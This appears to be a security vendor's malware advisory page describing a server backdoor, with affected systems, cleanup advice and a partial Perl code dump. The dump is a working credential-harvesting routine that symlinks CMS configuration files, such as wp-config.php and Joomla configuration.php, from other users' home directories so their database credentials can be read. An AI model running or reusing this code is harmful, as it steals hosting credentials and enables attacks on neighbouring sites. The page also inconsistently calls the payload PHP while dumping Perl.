PRICING SUPPORT LOGIN

Backdoors are server-side malicious scripts which are intended to perpetrate malicious acccess to the server. The typical example of such backdoors are various File Managers, Web Shells, tools for bypassing admin login or various one-purpose scripts allowing the attacker to upload and run another type of malicious scripts. The payload is PHP based, thus intended for server-side use and the payload is executed directly on the server, while the site is loaded. Only the payload result (such as Web Shell environment) is visible in the browser, not the malicious code itself. It's very common, that backdoors don't have any visible signs in the site code and it's impossible to detect them by accessing the infected site from outside. Server level analysis is necessary in case of infection by this type of malware.
This backdoor scans the whole server looking for configuration files for the most common CMSs, then creating a symlink where the attacker can inspect and use the data gathered to attack the other sites.

Affecting

Any vulnerable based website with perl support. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Inspect your server looking for any unknown perl file and remove them. Also, you can sign up with us and let our team remove the malware for you.

Dump


sub lil{
($user) = @_;
$msr = qx{pwd};
$kola=$msr."/".$user;
$kola=~s/\n//g;
symlink('/home/'.$user.'/public_html/vb/includes/config.php',$kola.'.txt');
symlink('/home/'.$user.'/public_html/includes/config.php',$kola.'1.txt');
symlink('/home/'.$user.'/public_html/config.php',$kola.'2.txt');
symlink('/home/'.$user.'/public_html/forum/includes/config.php',$kola.'3.txt');
symlink('/home/'.$user.'/public_html/admin/conf.php',$kola.'5.txt');
symlink('/home/'.$user.'/public_html/admin/config.php',$kola.'4.txt');
symlink('/home/'.$user.'/public_html/wp-config.php',$kola.'13.txt');
symlink('/home/'.$user.'/public_html/blog/wp-config.php',$kola.'14.txt');
symlink('/home/'.$user.'/public_html/conf_global.php',$kola.'6.txt');
symlink('/home/'.$user.'/public_html/include/db.php',$kola.'7.txt');
symlink('/home/'.$user.'/public_html/connect.php',$kola.'8.txt');
symlink('/home/'.$user.'/public_html/mk_conf.php',$kola.'9.txt');
symlink('/home/'.$user.'/public_html/configuration.php',$kola.'10.txt');
symlink('/home/'.$user.'/public_html/include/config.php',$kola.'12.txt');
symlink('/home/'.$user.'/public_html/joomla/configuration.php',$kola.'11.txt');
symlink('/home/'.$user.'/public_html/whm/configuration.php',$kola.'15.txt');
symlink('/home/'.$user.'/public_html/whmc/configuration.php',$kola.'16.txt');
symlink('/home/'.$user.'/public_html/support/configuration.php',$kola.'17.txt');